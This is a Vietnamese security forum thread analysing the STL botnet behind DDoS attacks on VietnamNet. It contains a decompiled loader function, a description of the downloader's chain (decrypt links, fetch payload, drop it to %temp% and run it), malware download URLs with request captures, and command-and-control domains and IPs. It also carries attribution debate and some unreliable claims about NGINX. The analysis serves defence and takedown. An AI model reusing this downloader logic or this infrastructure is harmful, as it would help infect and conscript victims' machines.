1. IAStorUIHelper.dll làm nhiệm vụ download, dùng pure socket API, export ra 3 hàm mạo danh. Nhưng 3 hàm này phải được bên ngoài gọi và truyền tham số vào. Hàm InvokeEx là hàm khởi tạo Windows Socket, hàm GetCLSID chính là hàm download. Nó chỉ build trong ruột User-Agent và HTTP Request string, còn toàn bộ nhận từ input parameter (tham số truyền vào) từ caller (hàm gọi). Hàm QueryInterface trả toàn bộ nội dung đã download về caller. 2. IAStorDataMgr.dll chỉ export 1 hàm duy nhất, GetInstance, cũng nhận tham số từ caller. Hàm GetInstance sẽ call và truyền tham số cho 2 hàm: GetCLSID và QueryInterface của IAStorUIHelper.dll. Hàm GetInstance parse và giãi mã bước 1 nội dung lấy về, trả về caller. 3. IAStorDataMgrSvc sẽ kiểm tra có đủ và đúng bộ dlls của nó hay không: Code:

bool __cdecl LoadDlls()
{
    HMODULE hIAStorCommon; // eax@1
    HMODULE hIAStorUIHelper; // eax@3
    HMODULE hIAStorDataMgr; // eax@5
    HMODULE hSmartPin; // eax@7
    HMODULE hSysInftLib; // eax@9

    hIAStorCommon = LoadLibraryW(L"IAStorCommon.dll");
    if ( hIAStorCommon )
        g_pfnGetFrameInfo = GetProcAddress(hIAStorCommon, "GetFrameInfo");
    hIAStorUIHelper = LoadLibraryW(L"IAStorUIHelper.dll");
    if ( hIAStorUIHelper )
    {
        g_pfnGetCLSID = GetProcAddress(hIAStorUIHelper, "GetCLSID");
        g_pfnQueryInterface = GetProcAddress(v2, "QueryInterface");
        g_pfnInvokeEx = GetProcAddress(v2, "InvokeEx");
    }
    hIAStorDataMgr = LoadLibraryW(L"IAStorDataMgr.dll");
    if ( hIAStorDataMgr )
        g_pfnGetInstance = GetProcAddress(hIAStorDataMgr, "GetInstance");
    hSmartPin = LoadLibraryW(L"SmartPin.dll");
    if ( hSmartPin )
        g_pfnEnumSataPort = GetProcAddress(hSmartPin, "EnumSataPort");
    hSysInftLib = LoadLibraryW(L"SysInftLib.dll");
    if ( hSysInftLib )
        g_pfnWaitForSignal = GetProcAddress(hSysInftLib, "WaitForSignal");
    return g_pfnGetFrameInfo
        && g_pfnGetCLSID
        && g_pfnQueryInterface
        && g_pfnInvokeEx
        && g_pfnGetInstance
        && g_pfnEnumSataPort
        && g_pfnWaitForSignal;
}

Nếu return FALSE, nó sẽ exit. Còn nếu TRUE, nó bắt đầu làm việc download nhờ các thread và vòng loop vô tận. EXE call InvokeEx của IAStorUIHelper.dll để khởi tạo Windows socket. Sau đó giải mã 4 link download dùng DES algorithm, truyền cho GetInstance, lấy kết quả trả về, rồi lại giãi mã một lần nữa để extract được file PE malware, ghi xuống %temp%, CreateProcess nó, wait xong delete.

Phân tích tính chất vài trận DDoS HVA vừa qua.

chieutuongtu — GMT

Em theo dõi topic thấy anh TQN có viết, đại ý: k vào được blogspot của gg = máy bị nhiễm STL's "mèo què". Lúc em vào blogspot thì nó ra thông báo này.

Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu? PS: e đang ở trường.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kết quả debug ra các host của con trojan downloader IAStor này sẽ down bot về: Code:

http://direct.fqin.net/codec.zip
 http://easy.lixns.com/codec.zip
 http://find.laxt.net/codec.zip
 http://second.xzin.net/codec.zip

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: easy.lixns.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: direct.fqin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: find.laxt.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: second.xzin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

Các bạn để ý: User-Agent đặc biệt của nó và chuổi đằng sau id=. Đây là chuổi Base64 Encode, chứa thông tin lây nhiễm trên máy victim.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

VỀ VIỆC XÁC ĐỊNH KỸ LAI MASTER WEBSERVER CỦA STL ĐIỀU KHIỂN CUỘC TẤN CÔNG DDoS VÀO HỆ THỐNG MẠNG CỦA VIETNAMNET 1- Về master webserver này ngoài ý kiến của tôi, đã có một số ý kiến khác, như sau:

PXMMRF 25/08/2011 23:00:12 wrote:

Master webserver có thể là một trong 2 webserver này: www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client). Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.

mv1098 26/08/2011 00:27:22 wrote:

@anh PXMMRF host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Nó nằm ở Panama City luôn anh à, thủ đô của nó là Panama luôn theo suy luận của em chắc là 200.74.244.198 vì có cái nginx quen thuộc

TQN 26/08/2011 01:51:49 wrote:

Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về. Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ. RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được. ………………………………………………………………. PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi: Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net
Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này -:|-

2- Ở đây chúng ta cần phân biệt hai nhóm website-webserver - Nhóm thứ nhất gồm 4 website: http://wide.ircop.cn http://pref.firebay.cn http://daily.leteaks.com http://link.susaks.com - Nhóm thứ hai chỉ có một website -webserver là: http://option.drfound.net Website của nhóm website-webserver thứ hai chứa một file (tại webroot) có tên là k113.css (dung lương 1.030KB). File này, như anh TQN đã RCE (với PEid 0.95- dùng một plugin phù hợp), chứa 2 file là iTunesHelper.exe và iTunesHelper-tray.exe. iTunesHelper.exe này chính là 1 DDoS tool của STL (đã qua thử nghiệm thưc tế trên server thử nghiệm của tôi) Websites của nhóm website-webserver thứ nhất mới là các master website-webserver điều khiển các cuộc tấn công DDoS vào mục tiêu. Trên các website này chứa các file .txt được mã hoá, hướng dẫn DDoS tool thay đổi mục tiêu tấn công (tên miền, đia chỉ IP, đia chỉ URL...).... Cần lưu ý là trong quá trình iTunesHelper.exe tấn công DDoS vao VIETNAMNET nó thường xuyên kết nôi với master website-webserver này. 3- Có gì khác nhau giữa hai đia chỉ: host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (do tôi xác định) và: Code:

http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net

do anh TQN xác định? Không có gì khác nhau cả. host-200-74-244-198.ccipanama.com là hostname (computer name) của webserver. Webserver này có IP tĩnh là 200.74.244.198. Tất cả 4 website http://wide.ircop.cn, http://pref.firebay.cn, http://daily.leteaks.com, http://link.susaks.com đều đang hosting (đặt) trên webserver này. Khi khởi phát trong hệ thống thì iTunesHelper.exe luôn kết nối đầu tiên với webserver nói trên. 4- Như đã phân tích webserver này đặt tại PANAMA (Trung Mỹ) Webserver chỉ cài một trình quản lý WEB là NGINX và bình thường các website trên nó chỉ có một file duy nhất là index.html với dòng chữ "ls-lia!" (không hiểu cấp trên của STL viết gì). Khi cần thiết các website trên webserver cùng upload các file .txt (đươc mã hoá) có nội dung giống nhau để update thông tin cho các DDoS tool, nằm trong các zombies trên mạng. Chắc chắn là webserver này đươc thiết lập chỉ nhằm mục đích điều khiển các cuộc tấn công DDoS, có thể trên phạm vi toàn cầu, không hẳn chỉ nhằm vào VIETNAMNET. Nhưng trong thời gian này nó "ưu tiên" cho mục tiêu VIETNAMNET. Mục tiêu tấn công là phải phục vụ cho "đường lối, mục tiêu chính trị' mà cấp trên chỉ đạo. Hì hì. Có người thắc mắc là sao một website với domain có hậu tố là .cn (China) lai được phép đặt ở nước ngoài. Câu trả lời là: Không rõ TQ có luật không cho phép các website của các cơ quan nhà nước đặt trên các webserver đặt tai nước ngoài, như ở VN, hay không?. Giả dụ nếu có, thì các lãnh đạo của STL sẽ tuyên bố: wide.ircop.cn, pref.firebay.cnchỉ là của tư nhân. Vả lai đã là việc của nhà nước, thì làm gì chả được, kể cả việc đó có vi phạm luật lệ hiện hành. 5- Như ta đã biết, các cấp trên của STL đang cho mang bot tấn công vào VIETNAMNET theo 2 hướng: - Tấn công vào mọi website (với các domain khác nhau) của VIETNAMNET - Tấn công vào kết cấu hạ tầng mạng của VIETNAMNET Thí dụ: - iTunesHelper.exe tấn công vào cả vietnamweek.net (Tuần Việt nam) . Đây là một webserver của vietnamnet đặt tai Mỹ có IP là 209.160.52.52. Action:Monitored Application:iTunesHelper.exe Access:Outbound TCP access Object:1580 -> 209.160.52.52:80 (http)----> vietnamweek.net Interface:[1] Compaq NC3131 Fast Ethernet NIC Time:8/30/2011 7:12:31 AM - iTunesHelper.exe cũng tấn công vào địa chỉ: 15.14.91.183-ftth.cmcti.vn (IP là 183.91.14.15, trong IP network 183.91.14.0/23) là route thuộc kết cấu hạ tầng cung cấp kết nối Internet cho tuanvietnam.net. 6- Những sự việc liên quan đến việc tấn công DDoS vao VIETNAMNET vừa qua, mà HVA đã phân tích, chứng tỏ đã có sự tham gia (can dự) của nhóm thành viên lãnh đạo của STL và họ là người TQ. Những công việc phức tạp đòi hỏi một nền tảng kỹ thuật mạng khá cao, như việc điều khiển, thiết lập, định kỳ ngừng hay đưa vào sử dụng các dedicated master-webserver đặt ở nhiều nơi trên TG (có cả PANAMA)... thì phải do các cấp lãnh đạo STL mới có khả năng và quyền hạn làm được. Mấy cậu STL tai VN chắc không thể có khả năng và/hoặc quyền hạn để làm. Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?

Ngay sau khi kích hoạt, iTunesHelper.exe kết nối đầu tiên với master-webserver

Vị trí địa lý, IP và hostname của master webserver

Vị trí địa lý, IP và hostname của option.drfound.net

Cuộc tấn công DDoS mới nhất (sáng nay) vào vietnamnet

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Trong 4 cái link trên của IAStore thì thấy có 2 cái đặt ở Parkistan, 2 cái ở US. Bà con kiểm tra thử !

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?

Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

chieutuongtu wrote:

Em theo dõi topic thấy anh TQN có viết, đại ý: k vào được blogspot của gg = máy bị nhiễm STL's "mèo què". Lúc em vào blogspot thì nó ra thông báo này.

Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu? PS: e đang ở trường.

Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

texudo wrote:

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.

Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Mr Ghost — GMT

@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Mr Ghost wrote:

@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. :D

Không phải thế đâu! Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

PXMMRF wrote:

Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.

Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server

Phân tích tính chất vài trận DDoS HVA vừa qua.

Mr Ghost — GMT

Mình để ý khá nhiều server STL đang dùng đều được mua ở những nơi được thanh toán bằng LR và Webmoney. Những nơi này không quan trọng khách hàng mình sử dụng nhằm mục đích gì ( có thể spam, adult hay phát tán virus hoặc dùng làm bàn đạp tấn công các site khác....) Ví dụ như cái server/VPS Panama của STL trên thì có thể được mua ở đây: Code:

http://www.ccihosting.com/servers.php?tab=linux_offshore_server

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

texudo wrote:

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.

Chào anh PXMMRF, Trong quá trình điều tra, em chưa hề thấy bất cứ một trao đổi hoặc thông tin liên lạc giữa các thành viên stl dùng tiếng Hoa cả. Tất cả đều liên lạc bằng tiếng Việt và họ dùng tiếng Việt cực kỳ đặc thù của người Việt chớ chẳng phải loại tiếng Việt của người ngoại quốc. Nếu những thành viên stl này là người Hoa nhưng dùng tiếng Việt cỡ như vậy thì họ phải là lực lượng cực kỳ đặc biệt. Em có một số người bạn gốc Hoa, sinh tại Việt Nam, họ nói tiếng Việt như người Việt nhưng không thể dùng văn viết như người Việt. Hơn nữa, từ cuối 2009 đến nay, có quá nhiều thông tin (IP, emails, traces....) về stl có nguồn đi từ Việt Nam. Chính McAfee và Google đã xác định việc này. Chính secureworks cũng đã đặt tên botnet đầu tiên của stl là "vecebot" để ám chỉ nguồn xuất phát là từ Việt Nam. Thêm một thông tin quan trọng nữa, từ lúc stl rùm beng trên mạng, họ liên tục đánh phá các trang web, các blogs lề trái. Cho đến khi vietnamnet, cụ thể là trang tuanvietnam bắt đầu gởi một số bài khá trung dung (nhưng không có lợi cho chính phủ và Đảng) thì họ (vietnamnet) bị tấn công. TQ không việc gì phải "dập" các trang lề trái từ hồi 2009. Nếu xét về mặt kỹ thuật, các botnets của TQ nếu cần ra tay thì không có một site nào của Việt Nam hoặc bất cứ quốc gia nào trên thế giới có thể sống nổi. Họ thừa tiền bạc, thừa kỹ thuật để làm chuyện này nhưng xét tổng thể thì họ chẳng có lý do gì phải dập các trang lề trái, kể cả những blogs lè tè của người Việt. Chính báo chí của TQ đã chính thức đăng những thông tin còn dung hại gấp trăm lần thì không việc gì họ phải làm những động thái bóp miệng những trang blogs của người Việt hết. Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

mv1098 wrote:

PXMMRF wrote:

Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.
Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server

Mình cũng thường tham khảo website này, nhưng chỉ để so sánh. Nhưng đó là một website khá tốt. Nói chung về các phương diện kiểm tra trên mang mình cố tìm và dùng những phần mêm Pro, chuyên nghiệp, hạng nhất (có soft giá chính thức đến vài trăm ngàn USD. Mình tìm phiên bản cũ rồi tìm cách update nó lên để tạm dùng). Tất nhiên là không thể mua chúng một cách chính thức. Trường hợp khác, có khi phải mua hàng trăm đĩa CD loại 6K, nay có chỗ tăng lên 8K (vì inflation) mới tìm ra cái soft. mình cần. Hoặc tìm trên mạng và rồi phải sống chung với virus. Trang crack nào cũng có cài mã độc cả

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?

1 mặt thì tấn công website lề trái, 1 mặt thì tấn công lề phải (Vietnamnet). Vậy mục đích của họ là gì? Vì bọn TQ có liên quan gì đến việc "ổn định chính trị" của Việt Nam cả. Nếu là TQ đánh vào cơ sở hạ tầng VN. Tại sao cơ quan nhà nước ta ko dám lên tiếng?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

PXMMRF wrote:

texudo wrote:

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.
Chào anh PXMMRF, .................................................................................................................... Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao?

Đó cũng là những câu hỏi mà tôi luôn trăn trở. Nay tình hình đã sáng ra, thông qua các phân tích của HVA vừa qua. "Trung tâm an ninh mạng" chỉ là một đơn vị hoạt đông theo kiểu hành chính. Biên chế của họ ít, nên không thể làm được các việc quan trọng, đòi hỏi nhiều công sức. Họ làm được gì các năm qua, thì ta đã thấy. Còn các bác ở vietnamnet có vẻ đang lúng túng. Chuyển từ báo in sang báo mạng, họ găp nhiều khó khăn và có thể vẫn làm việc theo cơ chế cũ kỹ. Ban Tổng biên tập của họ dường như không co các chuyên gia tầm cỡ về IT để có thể chỉ đạo và đưa ra các chính sách kỹ thuật, bảo mật hơp lý. Vietnamnet tăng trưởng quá nhanh, nhưng lại không cân đối với trình độ và năng lưc quản lý mạng, IT, vốn còn lạc hậu, không theo kip. Họ quản lý rất nhiều IP tĩnh nhưng việc bố trí các website và sử dụng khối IP đó một cách hợp lý thì lại đang có vấn đề. Khi bị tấn công DDoS, thay vì họ phải bố trí lại kết cấu hạ tầng mạng một cách hợp lý hơn, thì họ lai đưa các web server NGINX vào để thay thế Apache, hay làm một chốt chặn đầu vào, trong khi NGINX có một lỗi chết người là lỗi buffer overflow liên quan đến khả năng lọc input data của nó khá kém và hay có lỗi. Một số chuyên gia quốc tế nói là NGINX thường chỉ được các tổ chức tội phạm ưa dùng vì có thể "đánh nhanh rút nhanh". Với khả năng tài chính dồi dào, vietnamnet hoàn toàn có thể nhờ AkamaiTechnologies hỗ trợ và quản lý hệ thống để loại trừ tác hai của DDoS, như nhiều công ty lớn hay rất lớn của Mỹ đã nhờ, nhưng họ lại chưa làm. Không rõ tai sao... vân vân. Cũng có một điều là các công ty, xí nghiệp, tổ chức của VN thường có bệnh thành tích. Và vì vậy họ thường giấu kín các khuyết điểm, không muốn nói ra các khó khăn. Sơ bị trên đánh giá là thiếu năng lưc hoan thành nhiệm vụ.... Mà có nhờ ai, thì họ phải tìm những cơ quan lớn, cơ quan cấp trên (như Bộ Khoa học công nghệ chẳng hạn). Ai lai nhờ HVA, sợ mang tiếng. Thế đấy. Hi hì. Tôi cũng nghĩ là các thành viên STL là người VN 